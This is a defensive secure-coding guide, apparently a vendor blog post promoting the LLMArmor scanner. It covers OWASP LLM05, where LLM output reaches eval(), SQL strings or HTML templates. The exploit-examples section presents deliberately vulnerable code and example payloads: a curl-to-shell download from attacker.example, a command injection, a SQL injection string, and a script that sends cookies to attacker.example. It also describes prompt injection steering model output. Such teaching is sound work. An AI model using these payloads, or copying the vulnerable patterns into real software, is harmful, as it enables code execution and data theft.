LLM05: Improper Output Handling — Stop Trusting LLM Output
In March 2023, a security researcher disclosed CVE-2023-29374 — a remote code execution vulnerability in LangChain’s LLMMathChain. The chain worked by asking the LLM to produce a Python arithmetic expression and then calling eval() on the response. An attacker who could influence the math problem being solved could get the LLM to return __import__('os').system('curl attacker.example/shell | sh'), which eval() would execute with the application’s full privileges. A few months later, CVE-2023-36258 hit LangChain’s PALChain for the same reason: exec() on LLM output. The vulnerability wasn’t in the LLM. It was in the code that assumed LLM output was safe to execute.
Why LLM output is just untrusted user input
The moment you pass LLM output to any function that interprets its content — eval(), exec(), os.system(), a raw SQL string, a Jinja template — the LLM becomes the attack surface. An adversary who achieves prompt injection (LLM01) or who can influence the training data or fine-tuning examples (LLM04) can craft responses that exploit whichever sinks your application exposes.
Think of it this way: if a user could make the LLM say anything, what could they make your application do? If the answer is “execute arbitrary code” or “query any database row,” you have an LLM05 vulnerability.
Traditional AppSec thinking calls this a taint flow: user input → LLM response → dangerous sink. The LLM is just a non-deterministic relay in the taint chain. The fix is the same as for any taint flow: sanitize, validate, and use safe APIs at the sink.
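To make the taint-flow framing concrete, here is a minimal sketch of validating at the sink; the helper name and the username policy are illustrative assumptions, not part of any framework mentioned in this article:

```python
import re

# Example policy: lowercase letters, digits, underscores, max 32 chars
USERNAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")

def extract_username(llm_text: str) -> str:
    """Treat the LLM response as tainted: validate it before it reaches any sink."""
    candidate = llm_text.strip()
    if not USERNAME_RE.fullmatch(candidate):
        # Reject rather than try to "clean up"; apply the same rule as for any untrusted field
        raise ValueError("LLM output failed username validation")
    return candidate
```

The reject-by-default shape matters: anything the model says that does not match the expected pattern never reaches the query, the template, or the shell.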
Exploit examples
RCE via eval()
```python
# VULNERABLE: LLM output passed directly to eval()
from langchain.chat_models import ChatOpenAI

llm = ChatOpenAI(model="gpt-4o")

def calculate(expression: str) -> str:
    prompt = f"Return only a Python arithmetic expression for: {expression}"
    response = llm.invoke(prompt)
    result = eval(response.content)  # VULNERABLE: RCE
    return str(result)
```

Attacker input: "1 + 1; __import__('os').system('id > /tmp/pwned')"
The LLM returns a valid-looking expression that embeds a shell command. eval() executes it.
SQL injection via f-string
```python
# VULNERABLE: LLM output interpolated into SQL query
def lookup_user(user_description: str) -> dict:
    response = llm.invoke(f"Extract the username from: {user_description}")
    llm_name = response.content.strip()
    cursor.execute(  # VULNERABLE: SQLi
        f"SELECT * FROM users WHERE name = '{llm_name}'"
    )
    return cursor.fetchone()
```

Attacker input: "john' OR '1'='1' --" → LLM echoes it → SQL returns all rows.
XSS via Markup()
```python
# VULNERABLE: LLM summary rendered without escaping
from markupsafe import Markup
from flask import render_template_string

def render_summary(article_url: str) -> str:
    response = llm.invoke(f"Summarize: {article_url}")
    # VULNERABLE: Markup() disables autoescaping — LLM output renders as raw HTML
    return render_template_string(
        "<div>{{ summary }}</div>",
        summary=Markup(response.content),
    )
```

Attacker-controlled article content (indirect injection): <script>fetch('https://attacker.example/steal?c='+document.cookie)</script>
Mitigations
M1: Never pass LLM output to eval/exec/shell
Replace code-execution sinks with parser-based alternatives. If you need the LLM to produce structured data, use structured output with a schema:
```python
from pydantic import BaseModel
import openai

class MathResult(BaseModel):
    expression: str  # validated string, not executed
    result: float    # LLM computes the value, not eval()

client = openai.OpenAI()

def calculate_safe(problem: str) -> float:
    response = client.beta.chat.completions.parse(  # SAFE: structured output
        model="gpt-4o",
        messages=[{"role": "user", "content": f"Solve: {problem}. Return JSON."}],
        response_format=MathResult,
    )
    return response.choices[0].message.parsed.result  # SAFE: typed float, not exec'd
```
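Where the use case genuinely requires evaluating an LLM-produced arithmetic expression, a parser-based evaluator is a safer sink than eval(). The sketch below is an illustration of that idea (the helper and its operator allowlist are assumptions, not part of LangChain or the OpenAI SDK): it parses the expression into an AST and rejects anything that is not a numeric literal or a basic arithmetic operation.

```python
import ast
import operator

# Allowlist of arithmetic operations the evaluator will accept
_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub,
    ast.Mult: operator.mul, ast.Div: operator.truediv,
    ast.Pow: operator.pow, ast.USub: operator.neg,
}

def eval_arithmetic(expr: str) -> float:
    """Evaluate a pure-arithmetic expression without eval(); reject everything else."""
    def walk(node: ast.AST) -> float:
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"Disallowed node in LLM expression: {type(node).__name__}")
    return walk(ast.parse(expr, mode="eval"))
```

A payload like __import__('os').system(...) parses into Call and Attribute nodes, none of which are on the allowlist, so it is rejected instead of executed.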
M2: Parameterized queries for SQL

Always use parameterized queries (or an ORM) when LLM output reaches a database:
```python
# BAD: f-string SQL with LLM output
cursor.execute(f"SELECT * FROM users WHERE name = '{llm_name}'")  # VULNERABLE

# GOOD: parameterized query
cursor.execute(  # SAFE
    "SELECT * FROM users WHERE name = %s",
    (llm_name,),
)

# GOOD: ORM (SQLAlchemy)
user = session.query(User).filter(User.name == llm_name).first()  # SAFE
```
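One caveat: placeholders protect values, not identifiers. If the LLM also chooses a column or table name, the placeholder mechanism cannot help, so map its answer onto a hard-coded allowlist before it touches the query string. A minimal sketch, reusing the cursor from the examples above; the column mapping is an illustrative assumption:

```python
# Placeholders cover values only; identifiers must come from our own allowlist
ALLOWED_SORT_COLUMNS = {"name": "name", "created": "created_at", "email": "email"}

def order_users(llm_column_choice: str, llm_name: str) -> list:
    column = ALLOWED_SORT_COLUMNS.get(llm_column_choice.strip().lower())
    if column is None:
        raise ValueError("LLM chose a column outside the allowlist")
    # The identifier comes from our dict; the value still goes through a placeholder
    cursor.execute(
        f"SELECT * FROM users WHERE name = %s ORDER BY {column}",
        (llm_name,),
    )
    return cursor.fetchall()
```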
M3: Output encoding for HTML rendering

Use Jinja2’s autoescaping. Never wrap LLM content in Markup() or Django’s mark_safe():
```python
# BAD: disables autoescaping
return render_template_string(
    "<div>{{ summary }}</div>",
    summary=Markup(response.content),  # VULNERABLE: XSS
)

# GOOD: let Jinja2 escape automatically
return render_template_string(
    "<div>{{ summary }}</div>",
    summary=response.content,  # SAFE: autoescaped by default
)
```
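If LLM-authored rich text (for example Markdown) does need to be rendered as HTML, convert it first and then sanitize the result against an explicit tag allowlist before anything is marked safe for the template. A sketch using the markdown and bleach packages; the tag set is an example policy, not a prescription:

```python
import bleach
import markdown

# Example policy: only basic text-formatting tags survive; everything else is stripped
ALLOWED_TAGS = {"p", "em", "strong", "ul", "ol", "li", "code", "pre", "blockquote"}

def render_llm_markdown(llm_markdown: str) -> str:
    raw_html = markdown.markdown(llm_markdown)  # untrusted HTML derived from LLM output
    return bleach.clean(raw_html, tags=ALLOWED_TAGS, strip=True)  # allowlist-sanitized HTML
```

Only this sanitized string, never the raw model output, should be handed to the template as markup.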
M4: Schema-validated structured output

For any LLM output that feeds downstream logic, use OpenAI’s structured output (or a compatible equivalent) with a Pydantic schema. This constrains the LLM’s response to a known shape, preventing free-form text from reaching sinks:
```python
from pydantic import BaseModel, Field
import openai

class SearchQuery(BaseModel):
    entity_name: str = Field(max_length=100)
    entity_type: str = Field(pattern=r'^(user|product|order)$')  # allowlist via regex
    limit: int = Field(ge=1, le=100)

client = openai.OpenAI()

def build_query(user_request: str) -> SearchQuery:
    response = client.beta.chat.completions.parse(
        model="gpt-4o",
        messages=[{"role": "user", "content": user_request}],
        response_format=SearchQuery,  # SAFE: validated schema
    )
    return response.choices[0].message.parsed

query = build_query("find the last 10 orders for user john_doe")
cursor.execute(  # SAFE: typed, validated values
    "SELECT * FROM orders WHERE user = %s LIMIT %s",
    (query.entity_name, query.limit),
)
```
Detecting LLM05 with LLMArmor

LLMArmor’s taint analysis tracks LLM response variables (by name heuristic and AST taint) to dangerous sinks. It catches eval(llm_response.content) and similar patterns at commit time.
```bash
pip install llmarmor
llmarmor scan ./src
```

Example finding:

```text
LLM05 — Improper Output Handling [CRITICAL]
  chains.py:14  eval(response.content)
  LLM output variable 'response.content' passed to eval() — remote code execution risk.
  Fix: never pass LLM output to eval()/exec(). Use structured output with a Pydantic schema.
  Ref: https://owasp.org/www-project-top-10-for-large-language-model-applications/
```

See the full OWASP LLM Top 10 coverage reference for all LLM05 sink patterns.
Frequently asked questions
- Why is LLM output dangerous?
- LLM output is attacker-influenced. Anyone who can influence what the LLM says — through prompt injection, indirect injection via retrieved content, or influence over training data — can potentially control what reaches your application's sinks (eval(), SQL queries, HTML templates). LLM output must be treated as untrusted user input at every point it touches a sensitive operation.
- Is structured output (JSON mode) enough to prevent injection?
- JSON mode constrains the output format to valid JSON, but it does not constrain values. A JSON string field can still contain a SQL injection payload or script tag. Structured output with a Pydantic schema that enforces field types, lengths, and patterns provides meaningful protection. JSON mode alone is not sufficient.
- How do I safely render LLM output in HTML?
- Use Jinja2 with autoescaping enabled (the default in Flask and Django). Never wrap LLM content in Markup(), Django's mark_safe(), or any other function that disables HTML escaping. If you need to render rich text from an LLM, convert the Markdown to HTML and sanitize the result with an HTML-sanitizing library (like bleach) using an explicit allowlist of safe HTML tags.
- Can I let an agent run shell commands safely?
- Not safely in the general case. Shell command execution from LLM agents is an LLM08 (Excessive Agency) risk. If you need the LLM to run computations, use a sandboxed interpreter with explicit capability restrictions and no network or filesystem access. For arithmetic, use structured output and compute server-side. For code generation, evaluate in a container with resource limits and no sensitive data access.
- What's the difference between LLM05 and LLM08 (Excessive Agency)?
- LLM05 is about untrusted LLM output reaching dangerous sinks in your code (eval, SQL, HTML). LLM08 is about LLM agents being granted excessive tool permissions, autonomy, or capabilities. They often co-occur: an agent with shell tool access (LLM08) that receives a prompt-injected instruction (LLM01) that produces a malicious shell command (LLM05) executed without approval is a critical severity chain.
- How can I scan my codebase for unsafe LLM output sinks?
- Run llmarmor scan ./src. LLMArmor's taint analysis tracks variables named with LLM-context indicators (llm_response, ai_output, chat_result) and any tainted variable from a user-controlled source to dangerous sinks: eval(), exec(), subprocess.*, os.system(), Markup(), render_template_string(), and SQL f-string interpolation.